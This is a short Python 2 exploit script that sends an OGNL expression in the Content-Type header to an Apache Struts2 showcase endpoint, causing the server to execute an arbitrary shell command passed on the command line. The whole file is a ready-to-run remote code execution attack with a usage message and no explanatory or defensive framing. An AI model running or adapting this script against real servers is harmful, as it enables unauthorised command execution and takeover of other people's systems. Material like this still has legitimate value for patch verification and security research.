exploit.py

#!/usr/bin/python
# -*- coding: utf-8 -*-
import sys
import urllib2
import httplib

def exploit(host,cmd):
    ognl_payload = "%{(#_='multipart/form-data')."
    ognl_payload += "(#_memberAccess=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS)."
    ognl_payload += "(@java.lang.Runtime@getRuntime().exec('{}'))".format(cmd)
    ognl_payload += "}"

    if not ":" in host:
        host = "{}:8080".format(host)

    url = "http://{}/struts2-showcase-2.3.12/showcase.action".format(host)

    headers = {'Content-Type': ognl_payload}
    request = urllib2.Request(url, headers=headers)
    response = urllib2.urlopen(request).read()


if len(sys.argv) < 3:
    sys.exit('Usage: %s <host:port> <cmd>' % sys.argv[0])
else:
    exploit(sys.argv[1],sys.argv[2])